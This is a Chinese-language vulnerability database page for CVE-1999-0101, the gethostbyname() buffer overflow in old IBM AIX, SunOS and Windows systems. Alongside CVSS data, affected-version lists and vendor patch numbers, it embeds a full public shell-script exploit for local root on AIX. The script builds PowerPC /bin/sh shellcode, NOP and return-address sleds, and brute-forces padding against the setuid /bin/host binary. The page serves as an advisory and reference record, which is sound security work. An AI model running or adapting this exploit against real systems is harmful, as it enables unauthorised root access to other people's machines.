CVE-1999-0101
CVSS10.0
发布时间 :1996-12-10 00:00:00
修订时间 :2008-09-09 08:33:45
NMCOEPS    

[原文]Buffer overflow in AIX and Solaris "gethostbyname" library call allows root access through corrupt DNS host names.


[CNNVD]多家厂商gethostbyname()函数实现远程缓冲区溢出漏洞(CNNVD-199612-008)

        
        gethostbyname()是用于通过主机名获得网络地址的函数,使用在多种操作系统下。
        gethostbyname函数把数据拷贝到本地内存缓冲区时缺少正确边界缓冲检查,本地或远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以使用此函数的运行程序权限在系统上执行任意指令。
        当UNIX系统上的程序要查询主机名和获得它的网络地址,一般程序使用"gethostbyname()"库函数来解析。这个函数从域名系统中获得主机名作为参数,并返回主机地址给程序,由于对输入参数缺少正确的边界缓冲区检查,如果攻击者提供的超长的主机名参数就可以触发缓冲区溢出,精心构建参数数据可以以调用此库函数的运行程序进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:ibm:aix:4.1IBM AIX 4.1
cpe:/o:ibm:aix:3.2IBM AIX 3.2
cpe:/o:ibm:aix:4.2IBM AIX 4.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0101
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0101
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199612-008
(官方数据源) CNNVD

- 其它链接及资源

http://ciac.llnl.gov/ciac/bulletins/h-13.shtml
(VENDOR_ADVISORY)  CIAC  H-13

- 漏洞信息

多家厂商gethostbyname()函数实现远程缓冲区溢出漏洞
危急 其他
1996-12-10 00:00:00 2005-10-12 00:00:00
远程  
        
        gethostbyname()是用于通过主机名获得网络地址的函数,使用在多种操作系统下。
        gethostbyname函数把数据拷贝到本地内存缓冲区时缺少正确边界缓冲检查,本地或远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以使用此函数的运行程序权限在系统上执行任意指令。
        当UNIX系统上的程序要查询主机名和获得它的网络地址,一般程序使用"gethostbyname()"库函数来解析。这个函数从域名系统中获得主机名作为参数,并返回主机地址给程序,由于对输入参数缺少正确的边界缓冲区检查,如果攻击者提供的超长的主机名参数就可以触发缓冲区溢出,精心构建参数数据可以以调用此库函数的运行程序进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        IBM
        ---
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        IBM AIX 3.1:
        IBM AIX 3.2:
        IBM APAR IX60927
        IBM AIX 3.2.4:
        IBM APAR IX60927
        IBM AIX 3.2.5:
        IBM APAR IX60927
        IBM AIX 4.1:
        IBM APAR IX61019
        IBM AIX 4.1.1:
        IBM APAR IX61019
        IBM AIX 4.1.2:
        IBM APAR IX61019
        IBM AIX 4.1.3:
        IBM APAR IX61019
        IBM AIX 4.1.4:
        IBM APAR IX61019
        IBM AIX 4.1.5:
        IBM APAR IX61019
        IBM AIX 4.2:
        IBM APAR IX62144
        IBM AIX 4.2.1:
        IBM APAR IX62144
        
        http://service.software.ibm.com/aixsupport/

        Sun
        ---
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Sun Patch 103187-09
        
        http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=103187&rev=09

        Sun SunOS 5.5.1 _x86:
        Sun Patch 103614-06
        
        http://sunsolve.sun.com/pub-cgi/findPatch.pl?patchId=103614&rev=06

- 漏洞信息 (22251)

AIX 3.x/4.x,Windows 95/98/2000/NT 4,SunOS 5 gethostbyname() Buffer Overflow (EDBID:22251)
multiple remote
2006-09-28 Verified
0 RoMaNSoFt
N/A [点击下载]
source: http://www.securityfocus.com/bid/6853/info

A vulnerability has been discovered in multiple vendor implementations of the 'gethostbyname()' library function, which is used to resolve network addresses.

The 'gethostbyname()' function fails to implement sufficient bounds checking on data copied into local memory buffers.

Under some circumstances, attackers may exploit this issue to overwrite sensitive locations in memory and may leverage the issue to execute arbitrary commands with the privileges of the vulnerable application. This issue may be local or remote, depending on the particular applications that use the function on vulnerable systems.

Several applications may implement the 'gethostbyname()' function, thus exposing them to this vulnerability. Applications known to implement 'gethostbyname()' include various implementations of 'ping', 'ftp', and 'tftp'. Other applications may also be vulnerable. 

#!/bin/sh

#######################################
## Local r00t 'shell-exploit' for:   ##
## gethostbyname() Buffer Overflow   ##
## [ BID 6853 / CVE-1999-0101 ]      ##
##            - - -                  ##
## By Roman Medina-Heigl Hernandez   ##
## aka RoMaNSoFt <roman@rs-labs.com> ##
##                                   ##
## Madrid, 28.Sep.2006               ##
## ================================= ##
## Public release. Version 1.        ##
## --------------------------------- ##
##   -= http://www.rs-labs.com/ =-   ##
#######################################


#############################################################################
#                                                                           #
#  This is merely a proof of concept for what I call a "shell-exploit"      #
#                                                                           #
#  * Original IBM Advisory: ERS-SVA-E01-1996:007.1  (03.Dec.1996)           #
#  * Affected platforms: IBM AIX(r) 3.2.x, 4.1.x, 4.2.x                     #
#  * Exploit tested on: PowerPC-604 running AIX 4.1.4.0                     #
#  * No need to use a compiler, perl, etc. Shell-scripting power!           #
#    Now you know what a pure 'shell-exploit' is  :-)                       #
#  * Syntax:                                                                #
#    % ./rs_aix_host.sh [RET length] [NOP length] [4140|41|42]              #
#                                                                           #
###############################################################--[ EOT ]--###


### Default configuration
ret_length=100
nop_length=300

### Return Address
# AIX 4.1.4.0 - Tested
TGT4140="AIX 4.1.4.0"
RET4140="\057\362\054\330"	# 0x2ff22cd8
# Generic AIX 4.1 - Untested, we assume the former one. Mail me if you have a better guess
TGT41="AIX 4.1.x"
RET41=$RET4140
# Generic AIX 4.2 - Untested, we assume the former one. Mail me if you have a better guess
TGT42="AIX 4.2.x"
RET42=$RET4140

### Shellcode (LSD's Asmcodes - PowerPC/AIX)
#
# char _shellcode[]=        /* 12*4+8 bytes                 */
#    "\x7c\xa5\x2a\x79"     /* xor.    r5,r5,r5             */
#    "\x40\x82\xff\xfd"     /* bnel    <shellcode>          */
#    "\x7f\xe8\x02\xa6"     /* mflr    r31                  */
#    "\x3b\xff\x01\x20"     /* cal     r31,0x120(r31)       */
#    "\x38\x7f\xff\x08"     /* cal     r3,-248(r31)         */
#    "\x38\x9f\xff\x10"     /* cal     r4,-240(r31)         */
#    "\x90\x7f\xff\x10"     /* st      r3,-240(r31)         */
#    "\x90\xbf\xff\x14"     /* st      r5,-236(r31)         */
#    "\x88\x5f\xff\x0f"     /* lbz     r2,-241(r31)         */
#    "\x98\xbf\xff\x0f"     /* stb     r5,-241(r31)         */
#    "\x4c\xc6\x33\x42"     /* crorc   cr6,cr6,cr6          */
#    "\x44\xff\xff\x02"     /* svca                         */
#    "/bin/sh"
# #ifdef V41
#    "\x03"
# #endif
# #ifdef V42
#    "\x02"
# #endif

PARTIALCODE="\
\174\245\052\171\100\202\377\375\177\350\002\246\073\377\001\040\
\070\177\377\010\070\237\377\020\220\177\377\020\220\277\377\024\
\210\137\377\017\230\277\377\017\114\306\063\102\104\377\377\002\
\057\142\151\156\057\163\150\
"
# AIX 4.1
SHELLCODE41=$PARTIALCODE"\003"
# AIX 4.2
SHELLCODE42=$PARTIALCODE"\002"

### NOP
NOP="\117\377\373\202"	# 0x4ffffb82   /* cror 31,31,31 */

### Setuid binary (target)
CMD=/bin/host

### Functions
oct2bin_setup()
{
	# Better to use printf binary if present
	if [ `printf "dSR"` = "dSR" ] >/dev/null 2>&1 ; then
		_PRINTCMD="printf"
		_SYSV=""
	elif [ `echo "RS\c"` = "RS" ] >/dev/null 2>&1 ; then
		# System V
		_PRINTCMD="echo"
		_SYSV="\c"
	else
		# Linux/BSD
		_PRINTCMD="echo -n -e"
		_SYSV=""
	fi

	if ! [ `$_PRINTCMD "dSR"$_SYSV` = "dSR" ] >/dev/null 2>&1 ; then
		echo "Sorry, I don't know how to write raw binary data :-("
		echo "Please, modify oct2bin* functions and try again!"
		exit 2
	fi
}

oct2bin()
{
	$_PRINTCMD $1$_SYSV
}

printhex()
{
	oct2bin $1 | od -t x4 -A n | tr -cd 0123456789abcdefABCDEF
}


### Exploit really starts here...
echo "#######################################"
echo "## Local r00t 'shell-exploit' for:   ##"
echo "## gethostbyname() Buffer Overflow   ##"
echo "## [ BID 6853 / CVE-1999-0101 ]      ##"
echo "##   . . . . . . . . . . . . . . .   ##"
echo "## By: RoMaNSoFt <roman@rs-labs.com> ##"
echo "#######################################"
echo

### Check target binary
if [ -x $CMD -a -u $CMD ] ; then
	echo "[*] Target binary has suid bit [$CMD]"
else
	echo "Sorry, target doesn't exist or it's not suid or cannot be executed"
	exit 3
fi

### We accept (optional) parameters
if [ $1 ] ; then
	ret_length=$1
fi

if [ $2 ] ; then
	nop_length=$2
fi

# Default target platform
TARGET=$TGT4140
RET=$RET4140
SHELLCODE=$SHELLCODE41

if [ $3 ] ; then
	if [ $3 = "4140" ] ; then
		TARGET=$TGT4140
		RET=$RET4140
		SHELLCODE=$SHELLCODE41
	elif [ $3 = "41" ] ; then
		TARGET=$TGT41
		RET=$RET41
		SHELLCODE=$SHELLCODE41
	elif [ $3 = "42" ] ; then
		TARGET=$TGT42
		RET=$RET42
		SHELLCODE=$SHELLCODE42
	fi
fi

### First, we convert octal strings to raw binary
oct2bin_setup
RET=`oct2bin $RET`
NOP=`oct2bin $NOP`
SHELLCODE=`oct2bin $SHELLCODE`

### Second, we create the NOP & RET sleds
echo "[*] Setting up exploitation environment..."

ret_sled=""
i=$ret_length
while [ $i != 0 ]; do
	ret_sled=$ret_sled$RET
	i=$(($i-1))
done

nop_sled=""
i=$nop_length
while [ $i != 0 ]; do
	nop_sled=$nop_sled$NOP
	i=$(($i-1))
done

echo "--> TARGET = $TARGET // RET = 0x"`printhex $RET`" // RETs = $ret_length //"\
     " NOPs = $nop_length <--"

### Prior to exploitation the environment will be un-exported to preserve memory layout
### and previous RET calculations
for i in `env | cut -d= -f1` ; do
	typeset +x $i
done

### Exploit it!
echo "[*] Exploiting..."
PAD="A"
ipad="A"
i=0
SUCCESS=0
while [ $i -lt 4 ]; do
	jpad=""
	j=0
	while [ $j -lt 4 ]; do
		EGG=$ipad$nop_sled$SHELLCODE $CMD $jpad$ret_sled
		if [ $? = 0 ]; then
			SUCCESS=1
			break 2
		fi
		jpad=$PAD$jpad
		j=$(($j+1))
	done
	ipad=$PAD$ipad
	i=$(($i+1))
done

### Finish politely ;-)
if [ $SUCCESS = 1 ]; then
	echo "--> Guessed PAD: EGG = $i // RET = $j <--"
	echo "Owned :-)"
	STATUS=0
else
	echo "Bad luck :-("
	STATUS=1
fi

exit $STATUS

# --[ EOT ]--		

- 漏洞信息 (F50586)

rs_aix_host.sh (PacketStormID:F50586)
2006-10-04 00:00:00
Roman Medina-Heigl Hernandez aka RoMaNSoFt  rs-labs.com
exploit,overflow,shell
aix
CVE-1999-0101
[点击下载]

Shell exploit for AIX gethostbyname() Buffer Overflow vulnerability circa 1996.

- 漏洞信息

7990
ISC BIND gethostbyname() DNS Handling Remote Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified

- 漏洞描述

- 时间线

1996-02-22 Unknow
Unknow Unknow

- 解决方案

Upgrade ISC BIND to version 4.9.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Multiple Vendor gethostbyname() Buffer Overflow Vulnerability
Boundary Condition Error 6853
Yes No
1996-12-03 12:00:00 2006-10-03 05:30:00
This vulnerability was discovered by the vendor.

- 受影响的程序版本

Sun SunOS 5.5.1 _x86
Sun SunOS 5.5 _x86
Sun SunOS 5.5
Sun SunOS 5.1.1 _ppc
Sun SunOS 5.1.1
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
+ Avaya DefinityOne Media Servers
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
+ Avaya S8100 Media Servers 0
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows ME
Microsoft Windows 98SE
Microsoft Windows 98
Microsoft Windows 95 SR2
Microsoft Windows 95
Microsoft Windows 2000 Terminal Services SP3
+ Microsoft Windows 2000 Advanced Server SP3
+ Microsoft Windows 2000 Datacenter Server SP3
+ Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
+ Microsoft Windows 2000 Advanced Server SP1
+ Microsoft Windows 2000 Datacenter Server SP1
+ Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
IBM AIX 4.2.1
IBM AIX 4.2
IBM AIX 4.1.5
IBM AIX 4.1.4
IBM AIX 4.1.3
IBM AIX 4.1.2
IBM AIX 4.1.1
IBM AIX 4.1
IBM AIX 3.2.5
IBM AIX 3.2.4
IBM AIX 3.2
IBM AIX 3.1
IBM AIX 3.0 x

- 漏洞讨论

A vulnerability has been discovered in multiple vendor implementations of the 'gethostbyname()' library function, which is used to resolve network addresses.

The 'gethostbyname()' function fails to implement sufficient bounds checking on data copied into local memory buffers.

Under some circumstances, attackers may exploit this issue to overwrite sensitive locations in memory and may leverage the issue to execute arbitrary commands with the privileges of the vulnerable application. This issue may be local or remote, depending on the particular applications that use the function on vulnerable systems.

Several applications may implement the 'gethostbyname()' function, thus exposing them to this vulnerability. Applications known to implement 'gethostbyname()' include various implementations of 'ping', 'ftp', and 'tftp'. Other applications may also be vulnerable.

- 漏洞利用

The following exploit is available:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.commailto:vuldb@securityfocus.com.


IBM AIX 3.2
  • IBM IX60927


IBM AIX 3.2.4
  • IBM IX60927


IBM AIX 3.2.5
  • IBM IX60927


IBM AIX 4.1
  • IBM IX61019


IBM AIX 4.1.1
  • IBM IX61019


IBM AIX 4.1.2
  • IBM IX61019


IBM AIX 4.1.3
  • IBM IX61019


IBM AIX 4.1.4
  • IBM IX61019


IBM AIX 4.1.5
  • IBM IX61019


IBM AIX 4.2
  • IBM IX62144


IBM AIX 4.2.1
  • IBM IX62144


Sun SunOS 5.5

Sun SunOS 5.5.1 _x86

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站